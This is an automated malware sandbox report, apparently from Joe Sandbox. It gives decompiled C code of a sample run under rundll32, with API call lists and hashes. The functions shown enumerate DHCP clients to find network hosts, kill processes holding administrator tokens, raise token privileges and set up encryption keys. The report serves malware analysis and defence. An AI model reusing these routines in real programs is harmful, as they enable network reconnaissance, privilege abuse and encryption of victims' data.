                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				_v32 = 0;
                                                                                                                                                  				_v40 = 0;
                                                                                                                                                  				_v36 = 0;
                                                                                                                                                  				_v64 = 0;
                                                                                                                                                  				_v56 = 0x104;
                                                                                                                                                  				__imp__GetComputerNameExW(4,  &_v584,  &_v56);
                                                                                                                                                  				_t58 =  &_v584;
                                                                                                                                                  				__imp__DhcpEnumSubnets(_t58,  &_v48, 0x400,  &_v12,  &_v32,  &_v40);
                                                                                                                                                  				if(_t58 != 0) {
                                                                                                                                                  					L15:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t61 =  *_v12;
                                                                                                                                                  				_v60 = _t61;
                                                                                                                                                  				if(_t61 <= 0) {
                                                                                                                                                  					L14:
                                                                                                                                                  					__imp__DhcpRpcFreeMemory(_v12);
                                                                                                                                                  					goto L15;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L2;
                                                                                                                                                  				}
                                                                                                                                                  				do {
                                                                                                                                                  					L2:
                                                                                                                                                  					_t64 =  *((intOrPtr*)(_v12 + 4));
                                                                                                                                                  					__imp__DhcpGetSubnetInfo(0,  *((intOrPtr*)(_t64 + _t83 * 4)),  &_v20);
                                                                                                                                                  					if(_t64 == 0 &&  *((intOrPtr*)(_v20 + 0x1c)) == 0) {
                                                                                                                                                  						_t71 =  *((intOrPtr*)(_v12 + 4));
                                                                                                                                                  						__imp__DhcpEnumSubnetClients(0,  *((intOrPtr*)(_t71 + _t83 * 4)),  &_v44, 0x10000,  &_v16,  &_v36,  &_v64);
                                                                                                                                                  						if(_t71 != 0) {
                                                                                                                                                  							goto L13;
                                                                                                                                                  						}
                                                                                                                                                  						_t73 =  *_v16;
                                                                                                                                                  						_v52 = _t73;
                                                                                                                                                  						if(_t73 == 0 || _t88 >= _t73) {
                                                                                                                                                  							L12:
                                                                                                                                                  							__imp__DhcpRpcFreeMemory(_v16);
                                                                                                                                                  							goto L13;
                                                                                                                                                  						} else {
                                                                                                                                                  							do {
                                                                                                                                                  								_t89 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _t88 * 4));
                                                                                                                                                  								if(_t89 != 0) {
                                                                                                                                                  									_push( *_t89);
                                                                                                                                                  									_t85 = __imp__#14;
                                                                                                                                                  									if(E0477A567( *_t85()) != 0) {
                                                                                                                                                  										__imp__#12( *_t85( *_t89));
                                                                                                                                                  										_t86 = E0477641A(_t78);
                                                                                                                                                  										if(_t86 != 0) {
                                                                                                                                                  											E04776B95(_t79, 0, _a4);
                                                                                                                                                  											HeapFree(GetProcessHeap(), 0, _t86);
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								_t88 = _v24 + 1;
                                                                                                                                                  								_v24 = _t88;
                                                                                                                                                  							} while (_t88 < _v52);
                                                                                                                                                  							goto L12;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L13:
                                                                                                                                                  					_t83 = _v28 + 1;
                                                                                                                                                  					_v28 = _t83;
                                                                                                                                                  				} while (_t83 < _v60);
                                                                                                                                                  				goto L14;
                                                                                                                                                  			}





























                                                                                                                                                  0x04778d52
                                                                                                                                                  0x04778d54
                                                                                                                                                  0x04778d58
                                                                                                                                                  0x04778d5b
                                                                                                                                                  0x04778d5e
                                                                                                                                                  0x04778d61
                                                                                                                                                  0x04778d64
                                                                                                                                                  0x04778d67
                                                                                                                                                  0x04778d6a
                                                                                                                                                  0x04778d6d
                                                                                                                                                  0x04778d70
                                                                                                                                                  0x04778d73
                                                                                                                                                  0x04778d76
                                                                                                                                                  0x04778d79
                                                                                                                                                  0x04778d80
                                                                                                                                                  0x04778d9b
                                                                                                                                                  0x04778da2
                                                                                                                                                  0x04778daa
                                                                                                                                                  0x04778ea2
                                                                                                                                                  0x04778ea6
                                                                                                                                                  0x04778ea6
                                                                                                                                                  0x04778db3
                                                                                                                                                  0x04778db5
                                                                                                                                                  0x04778dba
                                                                                                                                                  0x04778e97
                                                                                                                                                  0x04778e9a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778dc0
                                                                                                                                                  0x04778dc0
                                                                                                                                                  0x04778dc7
                                                                                                                                                  0x04778dce
                                                                                                                                                  0x04778dd6
                                                                                                                                                  0x04778e00
                                                                                                                                                  0x04778e07
                                                                                                                                                  0x04778e0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778e14
                                                                                                                                                  0x04778e16
                                                                                                                                                  0x04778e1b
                                                                                                                                                  0x04778e7e
                                                                                                                                                  0x04778e81
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778e21
                                                                                                                                                  0x04778e21
                                                                                                                                                  0x04778e27
                                                                                                                                                  0x04778e2c
                                                                                                                                                  0x04778e2e
                                                                                                                                                  0x04778e30
                                                                                                                                                  0x04778e40
                                                                                                                                                  0x04778e47
                                                                                                                                                  0x04778e53
                                                                                                                                                  0x04778e57
                                                                                                                                                  0x04778e5e
                                                                                                                                                  0x04778e6c
                                                                                                                                                  0x04778e6c
                                                                                                                                                  0x04778e57
                                                                                                                                                  0x04778e40
                                                                                                                                                  0x04778e75
                                                                                                                                                  0x04778e76
                                                                                                                                                  0x04778e79
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778e21
                                                                                                                                                  0x04778e1b
                                                                                                                                                  0x04778e87
                                                                                                                                                  0x04778e8a
                                                                                                                                                  0x04778e8b
                                                                                                                                                  0x04778e8e
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,73F1C4E0,00000000), ref: 04778D80
                                                                                                                                                  • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 04778DA2
                                                                                                                                                  • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 04778DCE
                                                                                                                                                  • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 04778E07
                                                                                                                                                  • htonl.WS2_32(00000000), ref: 04778E36
                                                                                                                                                  • htonl.WS2_32(00000000), ref: 04778E44
                                                                                                                                                  • inet_ntoa.WS2_32(00000000), ref: 04778E47
                                                                                                                                                    • Part of subcall function 0477641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74164AB0,?), ref: 04776439
                                                                                                                                                    • Part of subcall function 0477641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04776446
                                                                                                                                                    • Part of subcall function 0477641A: HeapAlloc.KERNEL32(00000000), ref: 0477644D
                                                                                                                                                    • Part of subcall function 0477641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04776465
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04778E65
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04778E6C
                                                                                                                                                  • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 04778E81
                                                                                                                                                  • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 04778E9A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4121633671-0
                                                                                                                                                  • Opcode ID: e3486010e77943500642184224226011ae5ebfbfb63b30e0758f33cf323e1efb
                                                                                                                                                  • Instruction ID: ff099b1b51d732f672ff0f56f798afaccac384d04fc080d52d6c6668617837d3
                                                                                                                                                  • Opcode Fuzzy Hash: e3486010e77943500642184224226011ae5ebfbfb63b30e0758f33cf323e1efb
                                                                                                                                                  • Instruction Fuzzy Hash: D441C5B1D00219AFDF11EFA9D8889DEFBB8FF48300F518466E501E7210D774AA41CBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E0477841D(int _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				short _v20;
                                                                                                                                                  				struct _SID_IDENTIFIER_AUTHORITY _v24;
                                                                                                                                                  				long _t20;
                                                                                                                                                  				int _t21;
                                                                                                                                                  				long* _t31;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  
                                                                                                                                                  				if(( *0x4787bc0 & 0x00000002) != 0) {
                                                                                                                                                  					_t20 = GetCurrentProcessId();
                                                                                                                                                  					if(_a4 != _t20) {
                                                                                                                                                  						_t21 = OpenProcess(0x401, 0, _a4);
                                                                                                                                                  						_t38 = _t21;
                                                                                                                                                  						if(_t38 != 0) {
                                                                                                                                                  							if(OpenProcessToken(_t38, 0xe,  &_v16) != 0) {
                                                                                                                                                  								if(DuplicateToken(_v16, 2,  &_v12) != 0) {
                                                                                                                                                  									_v24.Value = 0;
                                                                                                                                                  									_v20 = 0x500;
                                                                                                                                                  									if(AllocateAndInitializeSid( &_v24, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v8) != 0) {
                                                                                                                                                  										_t31 =  &_a4;
                                                                                                                                                  										_a4 = 0;
                                                                                                                                                  										__imp__CheckTokenMembership(_v12, _v8, _t31);
                                                                                                                                                  										if(_t31 != 0 && _a4 != 0) {
                                                                                                                                                  											TerminateProcess(_t38, 0);
                                                                                                                                                  										}
                                                                                                                                                  										FreeSid(_v8);
                                                                                                                                                  									}
                                                                                                                                                  									CloseHandle(_v12);
                                                                                                                                                  								}
                                                                                                                                                  								CloseHandle(_v16);
                                                                                                                                                  							}
                                                                                                                                                  							_t21 = CloseHandle(_t38);
                                                                                                                                                  						}
                                                                                                                                                  						return _t21;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t20;
                                                                                                                                                  			}












                                                                                                                                                  0x0477842a
                                                                                                                                                  0x04778430
                                                                                                                                                  0x04778439
                                                                                                                                                  0x0477844c
                                                                                                                                                  0x04778452
                                                                                                                                                  0x04778456
                                                                                                                                                  0x04778472
                                                                                                                                                  0x04778485
                                                                                                                                                  0x0477849a
                                                                                                                                                  0x0477849d
                                                                                                                                                  0x047784ab
                                                                                                                                                  0x047784ad
                                                                                                                                                  0x047784b4
                                                                                                                                                  0x047784ba
                                                                                                                                                  0x047784c2
                                                                                                                                                  0x047784cb
                                                                                                                                                  0x047784cb
                                                                                                                                                  0x047784d4
                                                                                                                                                  0x047784d4
                                                                                                                                                  0x047784dd
                                                                                                                                                  0x047784dd
                                                                                                                                                  0x047784e2
                                                                                                                                                  0x047784e2
                                                                                                                                                  0x047784e5
                                                                                                                                                  0x047784e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047784e9
                                                                                                                                                  0x04778439
                                                                                                                                                  0x047784eb

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,04778555,?,?), ref: 04778430
                                                                                                                                                  • OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04778555,?,?), ref: 0477844C
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04778555,?,?), ref: 04778464
                                                                                                                                                  • DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04778555,?,?), ref: 0477847D
                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 047784A3
                                                                                                                                                  • CheckTokenMembership.ADVAPI32(?,?,?), ref: 047784BA
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 047784CB
                                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 047784D4
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 047784DD
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,04778555,?,?), ref: 047784E2
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,04778555,?,?), ref: 047784E5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2191316301-0
                                                                                                                                                  • Opcode ID: ad030eca88d4c98cd635b51a51224b5052c185c879c1b365d10523e4df8406f6
                                                                                                                                                  • Instruction ID: deab8037810295cef459412a03b16590146dde43b0d57448156dac50e4cc6673
                                                                                                                                                  • Opcode Fuzzy Hash: ad030eca88d4c98cd635b51a51224b5052c185c879c1b365d10523e4df8406f6
                                                                                                                                                  • Instruction Fuzzy Hash: 7A212C71940108BFEF20AFA1EC88AEE7B79FF44781F918026FA01A1150D7749E51DBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                  			E04777CC5(WCHAR* _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				struct _TOKEN_PRIVILEGES _v28;
                                                                                                                                                  				long _t23;
                                                                                                                                                  				int _t24;
                                                                                                                                                  
                                                                                                                                                  				_v28.PrivilegeCount = 0;
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				_t24 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0 && LookupPrivilegeValueW(0, _a4,  &(_v28.Privileges)) != 0) {
                                                                                                                                                  					_v28.PrivilegeCount = 1;
                                                                                                                                                  					_v16 = 2;
                                                                                                                                                  					_t24 = AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0, 0);
                                                                                                                                                  					_t23 = GetLastError();
                                                                                                                                                  					_v12 = _t23;
                                                                                                                                                  					if(_t23 != 0) {
                                                                                                                                                  						_t24 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				SetLastError(_v12);
                                                                                                                                                  				return _t24;
                                                                                                                                                  			}









                                                                                                                                                  0x04777cd2
                                                                                                                                                  0x04777cd8
                                                                                                                                                  0x04777cd9
                                                                                                                                                  0x04777cda
                                                                                                                                                  0x04777ce1
                                                                                                                                                  0x04777ce3
                                                                                                                                                  0x04777ce6
                                                                                                                                                  0x04777cf8
                                                                                                                                                  0x04777d17
                                                                                                                                                  0x04777d1e
                                                                                                                                                  0x04777d2b
                                                                                                                                                  0x04777d2d
                                                                                                                                                  0x04777d33
                                                                                                                                                  0x04777d38
                                                                                                                                                  0x04777d3a
                                                                                                                                                  0x04777d3a
                                                                                                                                                  0x04777d38
                                                                                                                                                  0x04777d3f
                                                                                                                                                  0x04777d4b

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,047779E8), ref: 04777CE9
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,047779E8), ref: 04777CF0
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04777D02
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04777D25
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 04777D2D
                                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000,?,?,?,047779E8), ref: 04777D3F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2365211911-0
                                                                                                                                                  • Opcode ID: 906e351d3e2ac747e81366bcaa83b967d220cc56b655a81c8f1d4bad6db8ea07
                                                                                                                                                  • Instruction ID: a75c78a5d0071df554c29cbb55bc005673b583d95e92e7cfacd830dc200c0f5b
                                                                                                                                                  • Opcode Fuzzy Hash: 906e351d3e2ac747e81366bcaa83b967d220cc56b655a81c8f1d4bad6db8ea07
                                                                                                                                                  • Instruction Fuzzy Hash: B8110975A01218BFDB109FE5DC889EFBFBCEF48750F508425EA05E2240D7749A45CBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                  			E0477559B(intOrPtr _a4) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                                  
                                                                                                                                                  				_t25 = __imp__CryptSetKeyParam;
                                                                                                                                                  				_v12 = 1;
                                                                                                                                                  				 *_t25(_a4, 4,  &_v12, 0);
                                                                                                                                                  				_v16 = 1;
                                                                                                                                                  				 *_t25(_a4, 3,  &_v16, 0);
                                                                                                                                                  				_t19 =  &_v8;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				__imp__CryptGetKeyParam(_a4, 1, 0, _t19, 0);
                                                                                                                                                  				if(_t19 != 0 && _v8 != 0) {
                                                                                                                                                  					_t19 = LocalAlloc(0x40, _v8);
                                                                                                                                                  					_v20 = _t19;
                                                                                                                                                  					if(_t19 != 0) {
                                                                                                                                                  						 *_t25(_a4, 1, _t19, 0);
                                                                                                                                                  						return LocalFree(_v20);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t19;
                                                                                                                                                  			}









                                                                                                                                                  0x047755a3
                                                                                                                                                  0x047755b9
                                                                                                                                                  0x047755bc
                                                                                                                                                  0x047755c8
                                                                                                                                                  0x047755cb
                                                                                                                                                  0x047755ce
                                                                                                                                                  0x047755d7
                                                                                                                                                  0x047755da
                                                                                                                                                  0x047755e2
                                                                                                                                                  0x047755ee
                                                                                                                                                  0x047755f4
                                                                                                                                                  0x047755f9
                                                                                                                                                  0x04775601
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775606
                                                                                                                                                  0x047755f9
                                                                                                                                                  0x04775610

                                                                                                                                                  APIs
                                                                                                                                                  • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 047755BC
                                                                                                                                                  • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 047755CB
                                                                                                                                                  • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 047755DA
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 047755EE
                                                                                                                                                  • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04775601
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 04775606
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptParam$Local$AllocFree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3966954206-0
                                                                                                                                                  • Opcode ID: 7d89ece78883e7b7a64e1d3197ab8b494537ba1ea9a966a9a0a3a2cea1497d94
                                                                                                                                                  • Instruction ID: e194288a818b06cc571782cdf051b892c92527afd129b6304557e97d6873f908
                                                                                                                                                  • Opcode Fuzzy Hash: 7d89ece78883e7b7a64e1d3197ab8b494537ba1ea9a966a9a0a3a2cea1497d94
                                                                                                                                                  • Instruction Fuzzy Hash: 3A0113B2900208BFEF219FD5DC84DEFBF7CEF44694F408466BA05A2140D2349A50DBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                  			E047756D8(int* __eax, intOrPtr _a4, void* _a8, void** _a12) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				intOrPtr _t22;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				int* _t25;
                                                                                                                                                  				int _t26;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  				intOrPtr* _t31;
                                                                                                                                                  				void** _t33;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  
                                                                                                                                                  				_t25 = __eax;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				if(_a12 != 0 && __eax != 0) {
                                                                                                                                                  					_t31 = __imp__CryptEncrypt;
                                                                                                                                                  					_v8 = 0xf0;
                                                                                                                                                  					 *_t31(_a4, 0, 1, 0, 0,  &_v8, 0, _t30, _t34);
                                                                                                                                                  					if(0 != 0) {
                                                                                                                                                  						_t20 = LocalAlloc(0x40, _v8);
                                                                                                                                                  						_v16 = _t20;
                                                                                                                                                  						 *_a12 = _t20;
                                                                                                                                                  						if(_t20 != 0) {
                                                                                                                                                  							memcpy(_t20, _a8, 0xf0);
                                                                                                                                                  							 *_t25 = 0xf0;
                                                                                                                                                  							_t22 =  *_t31(_a4, 0, 1, 0, _v16, _t25, _v8);
                                                                                                                                                  							_v12 = _t22;
                                                                                                                                                  							if(_t22 == 0) {
                                                                                                                                                  								_t33 = _a12;
                                                                                                                                                  								_t26 =  *_t25;
                                                                                                                                                  								_t23 =  *_t33;
                                                                                                                                                  								_t29 = _t23;
                                                                                                                                                  								while(_t26 != 0) {
                                                                                                                                                  									 *_t29 = 0;
                                                                                                                                                  									_t29 = _t29 + 1;
                                                                                                                                                  									_t26 = _t26 - 1;
                                                                                                                                                  								}
                                                                                                                                                  								LocalFree(_t23);
                                                                                                                                                  								 *_t33 = 0;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _v12;
                                                                                                                                                  			}
















                                                                                                                                                  0x047756df
                                                                                                                                                  0x047756e3
                                                                                                                                                  0x047756e9
                                                                                                                                                  0x047756f9
                                                                                                                                                  0x04775711
                                                                                                                                                  0x04775714
                                                                                                                                                  0x04775718
                                                                                                                                                  0x0477571f
                                                                                                                                                  0x04775728
                                                                                                                                                  0x0477572b
                                                                                                                                                  0x0477572f
                                                                                                                                                  0x04775736
                                                                                                                                                  0x04775741
                                                                                                                                                  0x04775750
                                                                                                                                                  0x04775752
                                                                                                                                                  0x04775757
                                                                                                                                                  0x04775759
                                                                                                                                                  0x0477575c
                                                                                                                                                  0x0477575e
                                                                                                                                                  0x04775760
                                                                                                                                                  0x04775764
                                                                                                                                                  0x04775766
                                                                                                                                                  0x04775769
                                                                                                                                                  0x0477576a
                                                                                                                                                  0x0477576a
                                                                                                                                                  0x0477576e
                                                                                                                                                  0x04775774
                                                                                                                                                  0x04775774
                                                                                                                                                  0x04775757
                                                                                                                                                  0x0477572f
                                                                                                                                                  0x04775777
                                                                                                                                                  0x0477577d

                                                                                                                                                  APIs
                                                                                                                                                  • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 04775714
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 0477571F
                                                                                                                                                  • memcpy.MSVCRT ref: 04775736
                                                                                                                                                  • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04775750
                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0477576E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptEncryptLocal$AllocFreememcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 55365748-0
                                                                                                                                                  • Opcode ID: 943d670855ca7f5d264eccb83fce26a5d8fedd39f125e5834f39f2e1fbcd3c32
                                                                                                                                                  • Instruction ID: 351c37b3cc564f58e5b4ca12ef1581ca168c3b8b189760a419b98225decf5dd9
                                                                                                                                                  • Opcode Fuzzy Hash: 943d670855ca7f5d264eccb83fce26a5d8fedd39f125e5834f39f2e1fbcd3c32
                                                                                                                                                  • Instruction Fuzzy Hash: 3D215CB5A00219FFDF219FA5DC84AAEBFADEF08790F508565F904A7250D6719A10CBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 0477579E
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,00000000,?,04775988,00000000,?,?,?,?,?,?,?,?), ref: 047757AD
                                                                                                                                                  • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 047757C6
                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,04775988,00000000,?,?,?,?,?,?,?,?), ref: 047757D6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                  • String ID:
